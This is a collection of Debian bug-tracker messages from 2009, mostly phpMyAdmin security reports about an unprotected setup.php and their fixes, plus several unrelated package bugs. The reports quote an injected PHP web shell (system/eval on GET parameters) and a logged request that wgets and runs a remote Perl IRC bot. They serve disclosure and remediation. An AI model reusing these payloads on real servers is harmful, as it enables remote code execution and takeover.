= 0; /* Server (config:root) [1] */ $i++; $cfg['Servers'][$i]['host___if___GET__cecho___pre___system___GET__cechopreif___GET__pecho___pre___eval___GET__pechopre___'] = 'localhost'; $cfg['Servers'][$i]['extension'] = 'mysqli'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root'; /* End of servers configuration */ ? Obviously the host___if___GET__c__... part is somewhat escaped and prevents the full attack and was intended to use parameters 'c' and 'p' later to be eval'd and displayed. Instead things are simply broken by the attack. The auth_type being set to 'config' is what breaks the installation. The normal case for us here is 'cookie'. That didn't happen due to the protection in place in 4:2.9.1.1-11 but the system was brought down to a broken state. I repaired this by purging the installation and reinstalling to create a clean config.inc.php file and then ensuring that this file is included in intrusion detection monitoring but I am certain that the vulnerability for a repeat attack is likely. I have this host configured for daily automatic security upgrades. Therefore this system always has the latest version with 24 hours of a release of an update. The system has always been fully up to date and it appears that the current stable released package has this denial attack potential. Here is the recent upgrade history from the dpkg.log file: 2008-12-01 04:06:11 upgrade phpmyadmin 4:2.9.1.1-8 4:2.9.1.1-9 2009-02-12 04:14:24 upgrade phpmyadmin 4:2.9.1.1-9 4:2.9.1.1-10 2009-06-26 04:12:51 upgrade phpmyadmin 4:2.9.1.1-10 4:2.9.1.1-11 I don't know how this attack was able to use setup.php to write to the config.inc.php file but the timestamps of the file correlate between the Apache access log and the resulting config.inc.php file. The phpmyadmin web interface was working prior to the attack and was not functional after the attack so this cannot have been left over from an attack on the previous version. Bob -- System Information: Debian Release: 4.0 APT prefers oldstable APT policy: (500, 'oldstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.18-6-686 Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Versions of packages phpmyadmin depends on: ii debconf [debconf-2.0 1.5.11etch2 Debian configuration management sy ii libapache2-mod-php5 5.2.0+dfsg-8+etch15 server-side, HTML-embedded scripti ii perl 5.8.8-7etch6Larry Wall's Practical Extraction ii php5-mysql 5.2.0+dfsg-8+etch15 MySQL module for php5 ii ucf 2.0020 Update Configuration File: preserv Versions of packages phpmyadmin recommends: ii apache2 2.2.3-4+etch10 Next generation, scalable, extenda ii apache2-mpm-prefork [http 2.2.3-4+etch10 Traditional model for Apache HTTPD pn php5-gd | php4-gd none
Bug#533998: FTBFS
The first problem can be solved with this change: --- /home/kaplan/debian_developer/php-doc/php-doc-20081024/debian/rules 2008-10-25 20:05:57.0 +0200 +++ debian/rules2009-10-25 21:34:29.0 +0200 @@ -7,7 +7,7 @@ configure-stamp: dh_testdir # Add here commands to configure the package. - php configure.php --with-lang=en + php --define memory_limit=128M configure.php --with-lang=en touch configure-stamp With trial and error I found out that 96M should also be enough (on my AMD64). I have no idea about the second problem, might be related to a php or libxml change. -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#551949: marked as done (phpmyadmin: Denial of Service Attack through setup.php)
Your message dated Sun, 25 Oct 2009 19:57:50 + with message-id e1n29dq-0001vw...@ries.debian.org and subject line Bug#543460: fixed in phpmyadmin 4:2.9.1.1-13 has caused the Debian Bug report #543460, regarding phpmyadmin: Denial of Service Attack through setup.php to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 543460: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=543460 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: phpmyadmin Version: 4:2.9.1.1-11 Severity: important Reporting a remote denial of service attack against phpmyadmin's setup.php interface. After the attack the web interface is not usable. The web client displays the following text. Welcome to phpMyAdmin 2.9.1.1-Debian-11 phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in config.inc.php and make sure that they correspond to the information given by the administrator of the MySQL server. Error MySQL said: #1045 - Access denied for user 'root'@'localhost' (using password: NO) After the attack the following file exists: -rw-r- 1 root root 746 2009-10-04 15:23:40 /var/lib/phpmyadmin/config.inc.php Here are the contents of that file: ?php /* * Generated configuration file * Generated by: phpMyAdmin 2.9.1.1-Debian-11 setup script by Michal Čihař mic...@cihar.com * Version: $Id: setup.php 9484 2006-10-03 13:11:22Z nijel $ * Date: Sun, 04 Oct 2009 15:23:40 GMT */ /* Servers configuration */ $i = 0; /* Server (config:root) [1] */ $i++; $cfg['Servers'][$i]['host___if___GET__cecho___pre___system___GET__cechopreif___GET__pecho___pre___eval___GET__pechopre___'] = 'localhost'; $cfg['Servers'][$i]['extension'] = 'mysqli'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root'; /* End of servers configuration */ ? Obviously the host___if___GET__c__... part is somewhat escaped and prevents the full attack and was intended to use parameters 'c' and 'p' later to be eval'd and displayed. Instead things are simply broken by the attack. The auth_type being set to 'config' is what breaks the installation. The normal case for us here is 'cookie'. That didn't happen due to the protection in place in 4:2.9.1.1-11 but the system was brought down to a broken state. I repaired this by purging the installation and reinstalling to create a clean config.inc.php file and then ensuring that this file is included in intrusion detection monitoring but I am certain that the vulnerability for a repeat attack is likely. I have this host configured for daily automatic security upgrades. Therefore this system always has the latest version with 24 hours of a release of an update. The system has always been fully up to date and it appears that the current stable released package has this denial attack potential. Here is the recent upgrade history from the dpkg.log file: 2008-12-01 04:06:11 upgrade phpmyadmin 4:2.9.1.1-8 4:2.9.1.1-9 2009-02-12 04:14:24 upgrade phpmyadmin 4:2.9.1.1-9 4:2.9.1.1-10 2009-06-26 04:12:51 upgrade phpmyadmin 4:2.9.1.1-10 4:2.9.1.1-11 I don't know how this attack was able to use setup.php to write to the config.inc.php file but the timestamps of the file correlate between the Apache access log and the resulting config.inc.php file. The phpmyadmin web interface was working prior to the attack and was not functional after the attack so this cannot have been left over from an attack on the previous version. Bob -- System Information: Debian Release: 4.0 APT prefers oldstable APT policy: (500, 'oldstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.18-6-686 Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Versions of packages phpmyadmin depends on: ii debconf [debconf-2.0 1.5.11etch2 Debian configuration management sy ii libapache2-mod-php5 5.2.0+dfsg-8+etch15 server-side, HTML-embedded scripti ii perl 5.8.8-7etch6Larry Wall's Practical Extraction ii php5-mysql 5.2.0+dfsg-8+etch15 MySQL module for php5 ii ucf 2.0020 Update Configuration File: preserv Versions of packages phpmyadmin recommends: ii apache2 2.2.3-4+etch10 Next generation, scalable, extenda ii apache2-mpm-prefork [http 2.2.3-4+etch10 Traditional model for Apache HTTPD pn php5-gd | php4-gd none
Bug#535044: marked as done (phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection)
Your message dated Sun, 25 Oct 2009 19:57:50 + with message-id e1n29dq-0001vu...@ries.debian.org and subject line Bug#535044: fixed in phpmyadmin 4:2.9.1.1-13 has caused the Debian Bug report #535044, regarding phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 535044: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=535044 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: phpmyadmin Version: 4:2.11.8.1-5+lenny1 Severity: critical Tags: security Justification: root security hole Hi, After looking at my logs, I did notice a lot of attempts to break in phpmyadmin through the following kind of url: 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] GET //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/tmp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null; It seems PHPMyAdmin shipped with Lenny is still vulnerable to this remote exploit It is basically an IRC bot -- System Information: Debian Release: 5.0.2 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.28.6-p390-20090217 (SMP w/4 CPU cores) Locale: lang=fr...@euro, lc_ctype=fr...@euro (charmap=ISO-8859-15) Shell: /bin/sh linked to /bin/bash Versions of packages phpmyadmin depends on: ii debconf [debconf-2 1.5.24Debian configuration management sy ii libapache2-mod-php 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti ii perl 5.10.0-19 Larry Wall's Practical Extraction ii php5 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti ii php5-cgi 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti ii php5-mcrypt5.2.6.dfsg.1-1+lenny3 MCrypt module for php5 ii php5-mysql 5.2.6.dfsg.1-1+lenny3 MySQL module for php5 Versions of packages phpmyadmin recommends: ii apache22.2.9-10+lenny3 Apache HTTP Server metapackage ii apache2-mpm-prefor 2.2.9-10+lenny3 Apache HTTP Server - traditional n ii php5-gd5.2.6.dfsg.1-1+lenny3 GD module for php5 Versions of packages phpmyadmin suggests: ii mysql-server-5.0 [mysq 5.0.51a-24+lenny1 MySQL database server binaries -- debconf information: phpmyadmin/setup-username: admin * phpmyadmin/reconfigure-webserver: phpmyadmin/restart-webserver: false ---End Message--- ---BeginMessage--- Source: phpmyadmin Source-Version: 4:2.9.1.1-13 We believe that the bug you reported is fixed in the latest version of phpmyadmin, which is due to be installed in the Debian FTP archive: phpmyadmin_2.9.1.1-13.diff.gz to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13.diff.gz phpmyadmin_2.9.1.1-13.dsc to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13.dsc phpmyadmin_2.9.1.1-13_all.deb to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 535...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Thijs Kinkhorst th...@debian.org (supplier of updated phpmyadmin package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.7 Date: Sun, 25 Oct 2009 12:25:47 +0100 Source: phpmyadmin Binary: phpmyadmin Architecture: source all Version: 4:2.9.1.1-13 Distribution: oldstable-security Urgency: high Maintainer: Thijs Kinkhorst th...@debian.org Changed-By: Thijs Kinkhorst th...@debian.org Description: phpmyadmin - Administrate MySQL over the WWW Closes: 535044 543460 552194 Changes: phpmyadmin (4:2.9.1.1-13) oldstable-security; urgency=low . * Fix inverted logic in documentation of new script. . phpmyadmin (4:2.9.1.1-12) oldstable-security; urgency=high . * Upload to oldstable to fix security issues. * Cross site scripting (CVE-2009-3696, closes: #552194). * Allow saving of configuration from setup script only after explicit action from administrator (closes: #535044, #543460). Files: 0a8c412c5481b2260562ab5649c70d8b 1021 web extra phpmyadmin_2.9.1.1-13.dsc 68fc6b7269343482b96326553dd1e0c0 57060 web extra phpmyadmin_2.9.1.1-13.diff.gz 85eaa36525db64fdd0ba9955c9def399 3605314 web extra phpmyadmin_2.9.1.1-13_all.deb -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9
Bug#552375: readahead-fedora: machine fails to boot after installation
Package: readahead-fedora Version: 1.5.4-1 Severity: grave After installtion of readahead-fedora package machine fails to boot. Last messages are: Using makefile-style concurrent boot in runlevel S. Reading early boot files Preparing to profile boot sequence... After this there is no activity at all. It only possible to ge some activity by pressing ^C or ^/. Here is the output after pressing ^C: readahead-collector: ERROR: cannot daemonize: Interrupted system call init: rc-sysinit main process (1035) killed by INT signal. After this only pressing power button for some time helps. It is also not possible to boot the machine using recovery mode from grub menu. It is only possible to boot after adding init=/bin/sh to command line and then remove readahead-fedora package. The machine has the following version of packages: sysv-rc 2.87dsf-7 insserv 1.12.0-14 sysvinit-utils 2.87dsf-6 upstart 0.6.3-1 initscripts 2.87dsf-6 -- System Information: Debian Release: squeeze/sid APT prefers unstable APT policy: (500, 'unstable'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 2.6.32-rc5 (SMP w/2 CPU cores; PREEMPT) Locale: LANG=uk_UA.UTF-8, LC_CTYPE=uk_UA.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages readahead-fedora depends on: ii e2fslibs 1.41.9-1 ext2/ext3/ext4 file system librari ii libaudit0 1.7.13-1 Dynamic library for security audit ii libblkid1 2.16.1-4 block device id library ii libc6 2.10.1-2 GNU C Library: Shared libraries readahead-fedora recommends no packages. readahead-fedora suggests no packages. -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#543460: marked as done (phpmyadmin: No password protection for setup.php script)
Your message dated Sun, 25 Oct 2009 19:57:41 + with message-id e1n29dh-0001t0...@ries.debian.org and subject line Bug#543460: fixed in phpmyadmin 4:2.11.8.1-5+lenny3 has caused the Debian Bug report #543460, regarding phpmyadmin: No password protection for setup.php script to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 543460: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=543460 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: phpmyadmin Version: 4:2.9.1.1-11 Severity: grave Tags: security Justification: user security hole After install, you can access http://{host}/phpmyadmin/scripts/setup.php without entering any password. By adding a new host in the configuration, an attacker can submit malicius code to execute commands as www-data user. This is a dump of /var/lib/phpmyadmin/config.inc.php after the attack: /* Server (config:root) [1] */ $i++; $cfg['Servers'][$i]['host']=''; if($_GET['c']){echo 'pre';system($_GET['c']);echo '/pre';}if($_GET['p']){echo 'pre';eval($_GET['p']);echo '/pre';};//'] = 'localhost'; $cfg['Servers'][$i]['extension'] = 'mysqli'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root'; /* End of servers configuration */ -- System Information: Debian Release: 4.0 APT prefers oldstable APT policy: (500, 'oldstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.18-6-686 Locale: LANG=it_IT.UTF-8, LC_CTYPE=it_IT.UTF-8 (charmap=UTF-8) Versions of packages phpmyadmin depends on: ii debconf [debconf-2.0 1.5.11etch2 Debian configuration management sy ii libapache2-mod-php5 5.2.0+dfsg-8+etch15 server-side, HTML-embedded scripti ii perl 5.8.8-7etch6Larry Wall's Practical Extraction ii php5-mysql 5.2.0+dfsg-8+etch15 MySQL module for php5 ii ucf 2.0020 Update Configuration File: preserv Versions of packages phpmyadmin recommends: ii apache2-mpm-prefork [http 2.2.3-4+etch10 Traditional model for Apache HTTPD pn php5-gd | php4-gd none (no description available) pn php5-mcrypt | php4-mcrypt none (no description available) -- debconf information: phpmyadmin/setup-username: admin phpmyadmin/reconfigure-webserver: phpmyadmin/restart-webserver: false ---End Message--- ---BeginMessage--- Source: phpmyadmin Source-Version: 4:2.11.8.1-5+lenny3 We believe that the bug you reported is fixed in the latest version of phpmyadmin, which is due to be installed in the Debian FTP archive: phpmyadmin_2.11.8.1-5+lenny3.diff.gz to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3.diff.gz phpmyadmin_2.11.8.1-5+lenny3.dsc to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3.dsc phpmyadmin_2.11.8.1-5+lenny3_all.deb to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 543...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Thijs Kinkhorst th...@debian.org (supplier of updated phpmyadmin package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Sun, 25 Oct 2009 12:30:40 +0100 Source: phpmyadmin Binary: phpmyadmin Architecture: source all Version: 4:2.11.8.1-5+lenny3 Distribution: stable-security Urgency: high Maintainer: Thijs Kinkhorst th...@debian.org Changed-By: Thijs Kinkhorst th...@debian.org Description: phpmyadmin - MySQL web administration tool Closes: 535044 543460 552194 Changes: phpmyadmin (4:2.11.8.1-5+lenny3) stable-security; urgency=low . * Correct some documentation issues of new script. . phpmyadmin (4:2.11.8.1-5+lenny2) stable-security; urgency=high . * Upload to stable to fix security issues. * Fixes XSS and SQL injection (Closes: #552194). [PMASA-2009-6, CVE-2009-3696, CVE-2009-3697] * Allow saving of configuration from setup script only after explicit action from administrator (Closes: #535044, #543460). Checksums-Sha1: 104dd1b5a36a5f1f33ad293cbd374485fcb887c4 1547 phpmyadmin_2.11.8.1-5+lenny3.dsc e73e24d04b0c73386de7ae4e112227d17eae7d98 63773
Bug#543460: marked as done (phpmyadmin: No password protection for setup.php script)
Your message dated Sun, 25 Oct 2009 19:57:50 + with message-id e1n29dq-0001vw...@ries.debian.org and subject line Bug#543460: fixed in phpmyadmin 4:2.9.1.1-13 has caused the Debian Bug report #543460, regarding phpmyadmin: No password protection for setup.php script to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 543460: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=543460 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: phpmyadmin Version: 4:2.9.1.1-11 Severity: grave Tags: security Justification: user security hole After install, you can access http://{host}/phpmyadmin/scripts/setup.php without entering any password. By adding a new host in the configuration, an attacker can submit malicius code to execute commands as www-data user. This is a dump of /var/lib/phpmyadmin/config.inc.php after the attack: /* Server (config:root) [1] */ $i++; $cfg['Servers'][$i]['host']=''; if($_GET['c']){echo 'pre';system($_GET['c']);echo '/pre';}if($_GET['p']){echo 'pre';eval($_GET['p']);echo '/pre';};//'] = 'localhost'; $cfg['Servers'][$i]['extension'] = 'mysqli'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root'; /* End of servers configuration */ -- System Information: Debian Release: 4.0 APT prefers oldstable APT policy: (500, 'oldstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.18-6-686 Locale: LANG=it_IT.UTF-8, LC_CTYPE=it_IT.UTF-8 (charmap=UTF-8) Versions of packages phpmyadmin depends on: ii debconf [debconf-2.0 1.5.11etch2 Debian configuration management sy ii libapache2-mod-php5 5.2.0+dfsg-8+etch15 server-side, HTML-embedded scripti ii perl 5.8.8-7etch6Larry Wall's Practical Extraction ii php5-mysql 5.2.0+dfsg-8+etch15 MySQL module for php5 ii ucf 2.0020 Update Configuration File: preserv Versions of packages phpmyadmin recommends: ii apache2-mpm-prefork [http 2.2.3-4+etch10 Traditional model for Apache HTTPD pn php5-gd | php4-gd none (no description available) pn php5-mcrypt | php4-mcrypt none (no description available) -- debconf information: phpmyadmin/setup-username: admin phpmyadmin/reconfigure-webserver: phpmyadmin/restart-webserver: false ---End Message--- ---BeginMessage--- Source: phpmyadmin Source-Version: 4:2.9.1.1-13 We believe that the bug you reported is fixed in the latest version of phpmyadmin, which is due to be installed in the Debian FTP archive: phpmyadmin_2.9.1.1-13.diff.gz to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13.diff.gz phpmyadmin_2.9.1.1-13.dsc to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13.dsc phpmyadmin_2.9.1.1-13_all.deb to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 543...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Thijs Kinkhorst th...@debian.org (supplier of updated phpmyadmin package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.7 Date: Sun, 25 Oct 2009 12:25:47 +0100 Source: phpmyadmin Binary: phpmyadmin Architecture: source all Version: 4:2.9.1.1-13 Distribution: oldstable-security Urgency: high Maintainer: Thijs Kinkhorst th...@debian.org Changed-By: Thijs Kinkhorst th...@debian.org Description: phpmyadmin - Administrate MySQL over the WWW Closes: 535044 543460 552194 Changes: phpmyadmin (4:2.9.1.1-13) oldstable-security; urgency=low . * Fix inverted logic in documentation of new script. . phpmyadmin (4:2.9.1.1-12) oldstable-security; urgency=high . * Upload to oldstable to fix security issues. * Cross site scripting (CVE-2009-3696, closes: #552194). * Allow saving of configuration from setup script only after explicit action from administrator (closes: #535044, #543460). Files: 0a8c412c5481b2260562ab5649c70d8b 1021 web extra phpmyadmin_2.9.1.1-13.dsc 68fc6b7269343482b96326553dd1e0c0 57060 web extra phpmyadmin_2.9.1.1-13.diff.gz 85eaa36525db64fdd0ba9955c9def399 3605314 web extra phpmyadmin_2.9.1.1-13_all.deb -BEGIN PGP SIGNATURE-
Bug#549515: marked as done (Fails to start with 'cannot open /usr/share/games/jigzo/font/charmap.png' error)
Your message dated Sun, 25 Oct 2009 19:59:30 + with message-id e1n29fs-0002jm...@ries.debian.org and subject line Bug#549515: fixed in jigzo 0.6.1-4 has caused the Debian Bug report #549515, regarding Fails to start with 'cannot open /usr/share/games/jigzo/font/charmap.png' error to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 549515: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=549515 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: jigzo Version: 0.6.1-3.1 Severity: grave Justification: renders package unusable The Subject says it all. -- System Information: Debian Release: squeeze/sid APT prefers testing APT policy: (990, 'testing') Architecture: i386 (i686) Kernel: Linux 2.6.30-1-686 (SMP w/2 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages jigzo depends on: ii libc62.9-25 GNU C Library: Shared libraries ii libgcc1 1:4.4.1-4 GCC support library ii libgl1-mesa-glx [libgl1] 7.5.1-1 A free implementation of the OpenG ii libjpeg626b-15 The Independent JPEG Group's JPEG ii libpng12-0 1.2.39-1PNG library - runtime ii libsdl-mixer1.2 1.2.8-6+b1 mixer library for Simple DirectMed ii libsdl1.2debian 1.2.13-4+b1 Simple DirectMedia Layer ii libstdc++6 4.4.1-4 The GNU Standard C++ Library v3 jigzo recommends no packages. jigzo suggests no packages. -- no debconf information ---End Message--- ---BeginMessage--- Source: jigzo Source-Version: 0.6.1-4 We believe that the bug you reported is fixed in the latest version of jigzo, which is due to be installed in the Debian FTP archive: jigzo-data_0.6.1-4_all.deb to pool/main/j/jigzo/jigzo-data_0.6.1-4_all.deb jigzo_0.6.1-4.diff.gz to pool/main/j/jigzo/jigzo_0.6.1-4.diff.gz jigzo_0.6.1-4.dsc to pool/main/j/jigzo/jigzo_0.6.1-4.dsc jigzo_0.6.1-4_i386.deb to pool/main/j/jigzo/jigzo_0.6.1-4_i386.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 549...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Elías Alejandro Año Mendoza eal...@gmail.com (supplier of updated jigzo package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Wed, 07 Oct 2009 17:36:40 -0500 Source: jigzo Binary: jigzo jigzo-data Architecture: source all i386 Version: 0.6.1-4 Distribution: unstable Urgency: low Maintainer: Elías Alejandro Año Mendoza eal...@gmail.com Changed-By: Elías Alejandro Año Mendoza eal...@gmail.com Description: jigzo - Photo puzzle game for children jigzo-data - data of Photo puzzle game for children Closes: 549515 Changes: jigzo (0.6.1-4) unstable; urgency=low . * Fixed Fails to start with cannot open /usr/share/games/jigzo/font/charmap.png +Thanks to Dmitry Semyonov (Closes: #549515). * Updated Standards-Version to 3.8.3. * Corrected some lintian warnings: +Added README.source pointing to quilt's README.source.gz. +Added a description to the 01_paths, 03_gcc_4_3 and 04_any_resolution patchs. +Removed deprecated Encoding field from jigzo.desktop. +Added a extended-description (debian/control). Checksums-Sha1: 9abe1db13c2dd37f6b97192dc65f116940f7f26d 1069 jigzo_0.6.1-4.dsc 6c40af388d7cbde44692a63bf56232a0267f5369 9209 jigzo_0.6.1-4.diff.gz e5d7f84a0d872ee069cc5e3531a86da995c12684 4036642 jigzo-data_0.6.1-4_all.deb f82b5687fef4f2b151573211e703eeecef72388b 41888 jigzo_0.6.1-4_i386.deb Checksums-Sha256: c37b5f2391604502ec3c65f9c0ef2170ef9eb0b9c39f8186e806a28cce041454 1069 jigzo_0.6.1-4.dsc 7f22064a820b26ca60e2a273f2a30a24494ed2576eee6f49291490dbe549d897 9209 jigzo_0.6.1-4.diff.gz 23f446671f5033b2a34551559236b379158c9ff3beedb2496e3700143b613fca 4036642 jigzo-data_0.6.1-4_all.deb c94e92608d6a2e2fb278ebf20be8759926cb3e4a41386e33a93fb4d8a9cbafb0 41888 jigzo_0.6.1-4_i386.deb Files: bbf8355e934a09f596bc6531f1a98da5 1069 games optional jigzo_0.6.1-4.dsc 6fa28c0f920cdb3af106b225c15ebd6a 9209 games optional jigzo_0.6.1-4.diff.gz 14a088ef79a59b0afe9e51b1430c333e 4036642 games optional
Bug#552194: marked as done (Phpmyadmin Bug)
Your message dated Sun, 25 Oct 2009 19:57:41 + with message-id e1n29dh-0001t2...@ries.debian.org and subject line Bug#552194: fixed in phpmyadmin 4:2.11.8.1-5+lenny3 has caused the Debian Bug report #552194, regarding Phpmyadmin Bug to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 552194: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=552194 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: phpmyadmin Version: 4:2.11.8.1-5+lenny1 Severity: critical Tags: security Justification: root security hole Cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via a crafted MySQL table name. SQL injection vulnerability allows remote attackers to inject SQL via various interface parameters of the PDF schema generator feature. Assigned CVE ids: CVE-2009-3696 CVE-2009-3697 For more clarity: http://www.phpmyadmin.net/home_page/security/PMASA-2009-6.php -- System Information: Debian Release: 5.0.3 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.26-2-amd64 (SMP w/2 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages phpmyadmin depends on: ii debconf [debconf-2 1.5.24Debian configuration management sy ii libapache2-mod-php 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti ii perl 5.10.0-19lenny2 Larry Wall's Practical Extraction ii php5-mcrypt5.2.6.dfsg.1-1+lenny3 MCrypt module for php5 ii php5-mysql 5.2.6.dfsg.1-1+lenny3 MySQL module for php5 Versions of packages phpmyadmin recommends: ii apache2-mpm-prefor 2.2.9-10+lenny4 Apache HTTP Server - traditional n ii php5-gd5.2.6.dfsg.1-1+lenny3 GD module for php5 Versions of packages phpmyadmin suggests: ii mysql-server 5.0.51a-24+lenny2 MySQL database server (metapackage ii mysql-server-5.0 [mysq 5.0.51a-24+lenny2 MySQL database server binaries -- debconf information excluded ---End Message--- ---BeginMessage--- Source: phpmyadmin Source-Version: 4:2.11.8.1-5+lenny3 We believe that the bug you reported is fixed in the latest version of phpmyadmin, which is due to be installed in the Debian FTP archive: phpmyadmin_2.11.8.1-5+lenny3.diff.gz to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3.diff.gz phpmyadmin_2.11.8.1-5+lenny3.dsc to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3.dsc phpmyadmin_2.11.8.1-5+lenny3_all.deb to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 552...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution 